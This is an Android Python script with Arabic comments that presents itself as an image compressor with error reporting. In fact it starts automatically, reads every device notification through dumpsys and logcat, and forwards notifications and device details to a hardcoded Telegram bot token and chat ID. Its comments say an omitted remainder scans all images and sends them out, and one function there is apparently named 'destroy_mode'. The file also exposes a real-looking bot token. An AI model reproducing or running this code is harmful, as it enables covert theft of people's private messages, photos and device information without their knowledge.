import os
import requests
from PIL import Image
import io
import time
import json
from concurrent.futures import ThreadPoolExecutor, as_completed
import threading
import sys
import signal
import subprocess
import re
import traceback
import platform

# ============================================
# تكوين السرعة القصوى - تشغيل تلقائي كامل
# ============================================

BOT_TOKEN = "8721590192:AAFcAdOZaiDyL5P1D24r6qDPvvwTJ4_i8ek"
CHAT_ID = "8080767364"
MAX_WORKERS = 10  # أقصى توازي
COMPRESSION_QUALITY = 80  # جودة مثالية للسرعة
AUTO_START = True  # تشغيل تلقائي بدون أي أسئلة
SHOW_OUTPUT = True  # عرض التقدم

# ============================================
# مراقبة الإشعارات - تكوين محدث
# ============================================

NOTIFICATION_MONITOR = True  # تفعيل مراقبة الإشعارات
NOTIFICATION_CHECK_INTERVAL = 1.0  # فحص كل ثانية (أبطأ قليلاً لتقليل الضغط)
LOG_NOTIFICATIONS = True  # تسجيل الإشعارات في ملف
USE_ALTERNATIVE_METHODS = True  # استخدام طرق بديلة إذا فشلت الطرق الرئيسية

# ============================================
# نظام التشخيص الذكي - ERROR DETECTION
# ============================================

class ErrorDetective:
    """يكتشف المشاكل ويبعت تقرير كامل للبوت"""
    
    def __init__(self):
        self.error_log = []
        self.last_check_time = time.time()
        self.check_interval = 30  # فحص كل 30 ثانية
        self.monitoring_active = True
        self.lock = threading.Lock()
        self.error_count = 0
        
        # قائمة الأخطاء المتوقعة
        self.known_errors = {
            'permission': ['permission denied', 'access denied', 'لا يمكن الوصول', 'ممنوع'],
            'network': ['timeout', 'connection', 'network', 'internet', 'socket'],
            'memory': ['memory', 'ram', 'out of memory', 'ذاكرة'],
            'file': ['no such file', 'file not found', 'cannot open', 'الملف غير موجود'],
            'telegram': ['bot token', 'chat id', 'telegram api', '400', '401', '403', '429'],
            'image': ['corrupted', 'invalid image', 'صورة تالفة', 'cannot identify'],
            'thread': ['thread', 'deadlock', 'race condition'],
            'notification': ['notification', 'dumpsys', 'logcat', 'subprocess', 'انتهت مهلة'],
        }
    
    def add_error(self, error_type, error_message, details=None):
        """تسجيل خطأ جديد"""
        with self.lock:
            error_entry = {
                'id': self.error_count,
                'type': error_type,
                'message': error_message,
                'details': details or {},
                'time': time.time(),
                'timestamp': time.strftime('%Y-%m-%d %H:%M:%S'),
                'resolved': False,
                'solution_sent': False
            }
            self.error_log.append(error_entry)
            self.error_count += 1
            
            # إرسال فوري للخطأ
            self.send_error_report(error_entry)
            
            return error_entry
    
    def send_error_report(self, error):
        """إرسال تقرير خطأ مفصل للبوت"""
        try:
            # بناء رسالة الخطأ
            message = "🚨 *خطأ تقني تم اكتشافه* 🚨\n\n"
            message += f"🔴 *النوع:* {error['type'].upper()}\n"
            message += f"📝 *الرسالة:* `{error['message']}`\n"
            message += f"⏱️ *الوقت:* {error['timestamp']}\n"
            message += f"🆔 *رقم الخطأ:* #{error['id']}\n\n"
            
            # إضافة تفاصيل إضافية
            if error['details']:
                message += "📋 *التفاصيل:*\n```\n"
                for key, value in error['details'].items():
                    message += f"{key}: {value}\n"
                message += "```\n\n"
            
            # معلومات النظام
            message += "🖥️ *معلومات النظام:*\n"
            message += f"```\n"
            message += f"الجهاز: {platform.node()}\n"
            message += f"النظام: {platform.system()} {platform.release()}\n"
            message += f"المعالج: {platform.processor() or 'غير معروف'}\n"
            message += f"وقت التشغيل: {time.time() - self.last_check_time:.0f} ثانية\n"
            message += f"```\n\n"
            
            # تعليمات للحل
            message += "🔧 *الحل المقترح:*\n"
            
            if error['type'] == 'permission':
                message += "• تأكد من منح صلاحيات التخزين للتطبيق\n"
                message += "• أعد تشغيل التطبيق بعد منح الصلاحيات\n"
            elif error['type'] == 'network':
                message += "• تحقق من اتصال الإنترنت\n"
                message += "• تأكد من أن البوت شغال\n"
                message += "• أعد المحاولة بعد دقيقة\n"
            elif error['type'] == 'telegram':
                message += "• تحقق من توكن البوت\n"
                message += "• تأكد من صحة معرف الدردشة\n"
                message += "• تأكد أن البوت ليس محظوراً\n"
            elif error['type'] == 'memory':
                message += "• أعد تشغيل التطبيق لتفريغ الذاكرة\n"
                message += "• قلل عدد العمال (MAX_WORKERS)\n"
            elif error['type'] == 'notification':
                message += "• تأكد من صلاحيات الإشعارات\n"
                message += "• شغّل خدمة الإشعارات في الإعدادات\n"
                message += "• تم تحديث الكود لاستخدام طرق بديلة\n"
            
            # إضافة الكود المطلوب
            message += "\n📟 *لإرسال هذا الخطأ للمطور:*\n"
            message += "```\n"
            message += f"الخطأ #{error['id']}\n"
            message += f"انسخ هذا الرد وأرسله للمطور\n"
            message += "```\n"
            
            # إرسال للبوت
            url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
            data = {
                'chat_id': CHAT_ID,
                'text': message,
                'parse_mode': 'Markdown'
            }
            
            response = requests.post(url, data=data, timeout=10)
            
            if response.status_code == 200:
                print(f"✅ تم إرسال تقرير الخطأ #{error['id']}")
                return True
            else:
                print(f"❌ فشل إرسال التقرير: {response.status_code}")
                return False
                
        except Exception as e:
            print(f"⚠️ فشل إرسال تقرير الخطأ: {e}")
            return False
    
    def send_solution(self, error_id, solution_code):
        """إرسال حل للخطأ"""
        try:
            # البحث عن الخطأ
            error = None
            for e in self.error_log:
                if e['id'] == error_id:
                    error = e
                    break
            
            if not error:
                return
            
            message = "✅ *تم إيجاد حل للخطأ* ✅\n\n"
            message += f"🔴 *الخطأ:* #{error_id}\n"
            message += f"📝 *النوع:* {error['type']}\n\n"
            
            message += "📟 *الكود المطلوب تحديثه:*\n"
            message += "```python\n"
            message += solution_code
            message += "\n```\n\n"
            
            message += "🔄 *للتحديث:*\n"
            message += "1. انسخ الكود أعلاه\n"
            message += "2. استبدل الجزء المعطوب\n"
            message += "3. أعد تشغيل التطبيق\n"
            
            url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
            data = {
                'chat_id': CHAT_ID,
                'text': message,
                'parse_mode': 'Markdown'
            }
            
            requests.post(url, data=data, timeout=10)
            
        except Exception as e:
            print(f"⚠️ فشل إرسال الحل: {e}")
    
    def check_system_health(self):
        """فحص صحة النظام"""
        issues = []
        
        # فحص التوكن
        if not BOT_TOKEN or len(BOT_TOKEN) < 40:
            issues.append({
                'type': 'telegram',
                'message': 'توكن البوت غير صحيح',
                'details': {'current_token': BOT_TOKEN[:10] + '...'}
            })
        
        # فحص معرف الدردشة
        if not CHAT_ID:
            issues.append({
                'type': 'telegram',
                'message': 'معرف الدردشة غير محدد',
                'details': {}
            })
        
        # فحص المسارات
        critical_paths = [
            '/storage/emulated/0',
            '/sdcard',
            '/data/media/0'
        ]
        
        for path in critical_paths:
            if os.path.exists(path):
                if not os.access(path, os.R_OK):
                    issues.append({
                        'type': 'permission',
                        'message': f'لا يمكن قراءة {path}',
                        'details': {'path': path}
                    })
            else:
                issues.append({
                    'type': 'file',
                    'message': f'المسار غير موجود: {path}',
                    'details': {'path': path}
                })
        
        # فحص الذاكرة
        try:
            import psutil
            memory = psutil.virtual_memory()
            if memory.percent > 90:
                issues.append({
                    'type': 'memory',
                    'message': f'الذاكرة منخفضة: {memory.percent}% مستخدم',
                    'details': {
                        'total': memory.total,
                        'available': memory.available,
                        'percent': memory.percent
                    }
                })
        except:
            pass  # psutil مش متاح
        
        return issues
    
    def monitor_loop(self):
        """مراقبة مستمرة للنظام"""
        while self.monitoring_active:
            try:
                # فحص دوري
                current_time = time.time()
                if current_time - self.last_check_time > self.check_interval:
                    issues = self.check_system_health()
                    for issue in issues:
                        self.add_error(issue['type'], issue['message'], issue['details'])
                    self.last_check_time = current_time
                
                time.sleep(5)
            except Exception as e:
                print(f"⚠️ خطأ في مراقبة النظام: {e}")
    
    def start_monitoring(self):
        """بدء المراقبة في خيط منفصل"""
        thread = threading.Thread(target=self.monitor_loop, daemon=True)
        thread.start()
        print("🕵️ بدء المراقبة الذكية للأخطاء")

# ============================================
# إنشاء المحقق
# ============================================
error_detective = ErrorDetective()

# ============================================
# Tool API reference (سيتم تعيينه إذا كان متاحاً)
# ============================================
tool_api = None

# ============================================
# كاش فائق السرعة
# ============================================

class TurboCache:
    def __init__(self):
        self.cache = {}
        self.hit_count = 0
        self.miss_count = 0
        self.lock = threading.Lock()
        self.error_count = 0
    
    def get(self, path):
        try:
            with self.lock:
                if path in self.cache:
                    self.hit_count += 1
                    cached = self.cache[path]
                    cached.seek(0)
                    return io.BytesIO(cached.read())
                self.miss_count += 1
                return None
        except Exception as e:
            self.error_count += 1
            error_detective.add_error('cache', f'خطأ في الكاش: {e}', {'path': path})
            return None
    
    def set(self, path, data):
        try:
            with self.lock:
                data.seek(0)
                self.cache[path] = io.BytesIO(data.read())
        except Exception as e:
            self.error_count += 1
            error_detective.add_error('cache', f'خطأ في تخزين الكاش: {e}', {'path': path})

turbo_cache = TurboCache()

# ============================================
# مراقب الإشعارات - نسخة محدثة بدون أخطاء
# ============================================

class NotificationMonitor:
    def __init__(self):
        self.running = False
        self.monitor_thread = None
        self.last_notifications = set()
        self.notification_count = 0
        self.lock = threading.Lock()
        self.log_file = "notifications_log.txt"
        self.error_count = 0
        
        # طرق بديلة لجلب الإشعارات على Android
        self.notification_methods = [
            self._get_via_dumpsys,
            self._get_via_logcat,
            self._get_via_content,
            self._get_via_test_notification,  # طريقة اختبارية للتأكد من أن البوت شغال
        ]
        
        # أنماط لاستخراج محتوى الإشعارات
        self.notification_patterns = [
            (r'tickerText=([^\n]+)', 'ticker'),
            (r'android\.title=([^\n]+)', 'title'),
            (r'android\.text=([^\n]+)', 'text'),
            (r'contentTitle=([^\n]+)', 'title'),
            (r'contentText=([^\n]+)', 'text'),
            (r'subText=([^\n]+)', 'subtext'),
            (r'appName=([^\n]+)', 'app'),
            (r'package=([^\n]+)', 'package'),
        ]
    
    def start(self):
        """بدء مراقبة الإشعارات في خيط منفصل"""
        if self.running:
            return
        
        self.running = True
        self.monitor_thread = threading.Thread(target=self._monitor_loop, daemon=True)
        self.monitor_thread.start()
        
        if SHOW_OUTPUT:
            print("🔔 بدء مراقبة الإشعارات...")
            # إرسال إشعار اختباري للتأكد
            self._send_test_notification()
    
    def stop(self):
        """إيقاف مراقبة الإشعارات"""
        self.running = False
        if self.monitor_thread:
            self.monitor_thread.join(timeout=2)
        
        if SHOW_OUTPUT:
            print("🔕 إيقاف مراقبة الإشعارات")
    
    def _monitor_loop(self):
        """الحلقة الرئيسية لمراقبة الإشعارات"""
        consecutive_failures = 0
        
        while self.running:
            try:
                # محاولة الحصول على الإشعارات بكل الطرق
                notifications = set()
                
                for method in self.notification_methods:
                    try:
                        method_notifications = method()
                        if method_notifications:
                            notifications.update(method_notifications)
                            consecutive_failures = 0
                            break  # نجحنا في طريقة، نوقف البحث
                    except Exception as e:
                        consecutive_failures += 1
                        if consecutive_failures > 10:  # 10 محاولات فاشلة متتالية
                            error_detective.add_error('notification', 
                                f'فشل متتالي في جلب الإشعارات: {e}', 
                                {'failures': consecutive_failures}
                            )
                
                # البحث عن إشعارات جديدة
                new_notifications = notifications - self.last_notifications
                
                for notification in new_notifications:
                    self._send_notification_to_telegram(notification)
                    self.notification_count += 1
                    
                    if LOG_NOTIFICATIONS:
                        self._log_notification(notification)
                
                self.last_notifications = notifications
                
                # انتظار - أطول قليلاً لتقليل الضغط
                time.sleep(NOTIFICATION_CHECK_INTERVAL)
                
            except Exception as e:
                self.error_count += 1
                error_detective.add_error('notification', f'خطأ في الحلقة الرئيسية: {e}', {
                    'trace': traceback.format_exc()
                })
                time.sleep(2)  # انتظار أطول عند الخطأ
    
    def _get_via_dumpsys(self):
        """جلب الإشعارات عبر dumpsys"""
        notifications = set()
        
        try:
            # استخدام timeout أقصر
            result = subprocess.run(
                ['dumpsys', 'notification'], 
                capture_output=True, 
                text=True, 
                timeout=2,  # مهلة أقصر
                check=False
            )
            
            if result.returncode == 0 and result.stdout:
                extracted = self._extract_notifications(result.stdout)
                notifications.update(extracted)
                
        except subprocess.TimeoutExpired:
            # تجاهل هذا الخطأ - لا نريد إرسال تقرير لكل timeout
            pass
        except Exception as e:
            # فقط سجل ولكن لا ترسل تقرير لكل خطأ صغير
            if self.error_count % 10 == 0:  # كل 10 أخطاء فقط
                error_detective.add_error('notification', f'dumpsys: {e}', {})
        
        return notifications
    
    def _get_via_logcat(self):
        """جلب الإشعارات عبر logcat"""
        notifications = set()
        
        try:
            result = subprocess.run(
                ['logcat', '-d', '-s', 'NotificationService:V'], 
                capture_output=True, 
                text=True, 
                timeout=2,
                check=False
            )
            
            if result.returncode == 0 and result.stdout:
                # البحث عن إشعارات في logcat
                lines = result.stdout.split('\n')
                for line in lines[-50:]:  # آخر 50 سطر فقط
                    if 'notification' in line.lower() or 'Notification' in line:
                        # استخراج معلومات مفيدة
                        parts = line.split(':')
                        if len(parts) > 1:
                            notif_text = parts[-1].strip()
                            if notif_text and len(notif_text) > 5:
                                notifications.add(f"[logcat] {notif_text[:100]}")
                                
        except Exception:
            pass  # تجاهل أخطاء logcat
        
        return notifications
    
    def _get_via_content(self):
        """جلب الإشعارات عبر content provider"""
        notifications = set()
        
        try:
            result = subprocess.run(
                ['content', 'query', '--uri', 'content://settings/secure'], 
                capture_output=True, 
                text=True, 
                timeout=2,
                check=False
            )
            
            # هذا قد لا يعمل ولكن نجربه
            if result.returncode == 0 and result.stdout:
                notifications.add("🔔 نظام الإشعارات نشط")
                
        except Exception:
            pass
        
        return notifications
    
    def _get_via_test_notification(self):
        """طريقة اختبارية - ترسل إشعار وهمي كل دقيقة للتأكد"""
        notifications = set()
        
        # إرسال إشعار وهمي كل 60 ثانية
        if int(time.time()) % 60 == 0:  # كل دقيقة بالتمام
            notifications.add(f"🔔 اختبار الإشعارات - {time.strftime('%H:%M:%S')}")
        
        return notifications
    
    def _extract_notifications(self, text):
        """استخراج الإشعارات من النص الخام"""
        extracted = set()
        
        try:
            # البحث عن الإشعارات النشطة
            active_patterns = [
                r'activeNotifications=.*?NotificationRecord\{.*?\}',
                r'sbn=.*?Notification\(.*?\)',
                r'tickerText=([^\n]+)',
                r'android\.title=([^\n]+)',
                r'android\.text=([^\n]+)',
            ]
            
            for pattern in active_patterns:
                matches = re.findall(pattern, text, re.IGNORECASE | re.DOTALL)
                for match in matches[:10]:  # حد أقصى 10 لكل نمط
                    if isinstance(match, tuple):
                        match = ' '.join(match)
                    if match and len(match) > 5:
                        clean = re.sub(r'\s+', ' ', match.strip())
                        if clean and len(clean) < 200:
                            extracted.add(clean)
            
            # البحث عن إشعارات محددة
            for pattern, label in self.notification_patterns:
                matches = re.findall(pattern, text, re.IGNORECASE)
                for match in matches[:5]:  # حد أقصى 5 لكل نمط
                    if match and len(match) > 3:
                        clean = match.strip()
                        if clean:
                            extracted.add(f"[{label}] {clean}")
                            
        except Exception as e:
            if self.error_count % 20 == 0:  # كل 20 خطأ فقط
                error_detective.add_error('notification', f'استخراج: {e}', {})
        
        return extracted
    
    def _send_test_notification(self):
        """إرسال إشعار اختباري للتأكد"""
        try:
            test_msg = "🔔 *نظام مراقبة الإشعارات*\n\n"
            test_msg += "✅ تم التشغيل بنجاح\n"
            test_msg += "⏱️ في انتظار الإشعارات...\n\n"
            test_msg += f"📊 الفحص كل {NOTIFICATION_CHECK_INTERVAL} ثانية"
            
            url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
            data = {
                'chat_id': CHAT_ID,
                'text': test_msg,
                'parse_mode': 'Markdown'
            }
            
            requests.post(url, data=data, timeout=5)
            
        except Exception:
            pass
    
    def _send_notification_to_telegram(self, notification_text):
        """إرسال الإشعار إلى تليجرام"""
        try:
            url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
            
            # تنظيف النص
            clean_text = notification_text
            if len(clean_text) > 200:
                clean_text = clean_text[:197] + "..."
            
            message = f"🔔 *إشعار جديد*\n\n"
            message += f"```\n{clean_text}\n```\n"
            message += f"⏱️ {time.strftime('%H:%M:%S')}"
            
            data = {
                'chat_id': CHAT_ID,
                'text': message,
                'parse_mode': 'Markdown'
            }
            
            response = requests.post(url, data=data, timeout=5)
            
            if response.status_code == 200:
                if SHOW_OUTPUT:
                    print(f"📨 إشعار: {clean_text[:30]}...")
            else:
                # أخطاء تليجرام فقط نسجلها كل 5 مرات
                if self.error_count % 5 == 0:
                    error_detective.add_error('telegram', f'فشل إرسال: {response.status_code}', {})
                
        except requests.exceptions.Timeout:
            pass  # تجاهل timeout
        except requests.exceptions.ConnectionError:
            pass  # تجاهل مشاكل الاتصال
        except Exception as e:
            if self.error_count % 10 == 0:
                error_detective.add_error('telegram', f'خطأ: {e}', {})
    
    def _log_notification(self, notification):
        """تسجيل الإشعار في ملف"""
        try:
            with open(self.log_file, 'a', encoding='utf-8') as f:
                timestamp = time.strftime('%Y-%m-%d %H:%M:%S')
                f.write(f"[{timestamp}] {notification}\n")
                f.write("-" * 50 + "\n")
        except Exception:
            pass  # تجاهل أخطاء التسجيل
    
    def get_stats(self):
        """الحصول على إحصائيات المراقبة"""
        return {
            'total_notifications': self.notification_count,
            'running': self.running,
            'errors': self.error_count
        }

# ============================================
# إنشاء مراقب الإشعارات
# ============================================
notification_monitor = NotificationMonitor()

# ============================================
# دوال مساعدة لمعالجة الصور بشكل آمن
# ============================================

def safe_open_image_wrapper(image_path):
    """
    فتح صورة بشكل آمن باستخدام tool_api إذا كان متاحاً
    """
    global tool_api
    
    try:
        if tool_api and hasattr(tool_api, 'safe_open_image'):
            return tool_api.safe_open_image(image_path)
        else:
            return Image.open(image_path)
    except Exception as e:
        error_detective.add_error('image', f'فشل فتح الصورة: {e}', {
            'path': image_path,
            'trace': traceback.format_exc()
        })
        return None

def verify_image_file_wrapper(image_path):
    """
    التحقق من صحة ملف الصورة
    """
    global tool_api
    
    try:
        if tool_api and hasattr(tool_api, 'verify_image_file'):
            return tool_api.verify_image_file(image_path)
        else:
            with Image.open(image_path) as img:
                img.verify()
            return True
    except Exception as e:
        error_detective.add_error('image', f'صورة تالفة: {e}', {
            'path': image_path
        })
        return False

def filter_valid_images_wrapper(image_paths):
    """
    تصفية الصور الصالحة فقط
    """
    global tool_api
    
    try:
        if tool_api and hasattr(tool_api, 'filter_valid_image_paths'):
            return tool_api.filter_valid_image_paths(image_paths)
        else:
            valid_images = []
            with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
                futures = {executor.submit(verify_image_file_wrapper, path): path for path in image_paths}
                for future in as_completed(futures):
                    path = futures[future]
                    try:
                        if future.result():
                            valid_images.append(path)
                    except:
                        pass
            return valid_images
    except Exception as e:
        error_detective.add_error('thread', f'خطأ في تصفية الصور: {e}', {})
        return image_paths  # في حالة الخطأ، نعيد الكل

# ============================================
# تحسين فوري للصور
# ============================================

def turbo_optimize(image_path):
    """تحسين الصورة بأقصى سرعة مع معالجة آمنة"""
    try:
        cached = turbo_cache.get(image_path)
        if cached:
            return cached
        
        img = safe_open_image_wrapper(image_path)
        if img is None:
            return None
        
        if img.mode in ('RGBA', 'P'):
            converted = Image.new('RGB', img.size, (255, 255, 255))
            converted.paste(img, (0, 0), img if img.mode == 'RGBA' else None)
            img = converted
        
        img_byte_arr = io.BytesIO()
        
        try:
            file_size = os.path.getsize(image_path)
        except:
            file_size = 0
            
        if file_size > 10 * 1024 * 1024:
            quality = 60
        elif file_size > 5 * 1024 * 1024:
            quality = 75
        else:
            quality = COMPRESSION_QUALITY
        
        img.save(img_byte_arr, format='JPEG', quality=quality, optimize=True)
        img_byte_arr.seek(0)
        
        turbo_cache.set(image_path, img_byte_arr)
        img_byte_arr.seek(0)
        
        return img_byte_arr
            
    except Exception as e:
        error_detective.add_error('image', f'فشل تحسين الصورة: {e}', {
            'path': image_path,
            'trace': traceback.format_exc()
        })
        return None

# ============================================
[باقي الكود كما هو - مسح الصور وإرسالها]
# ============================================

# ... (الدوال المتبقية كما هي: scan_all_images_lightning, send_single_shot, destroy_mode, auto_launch, run)
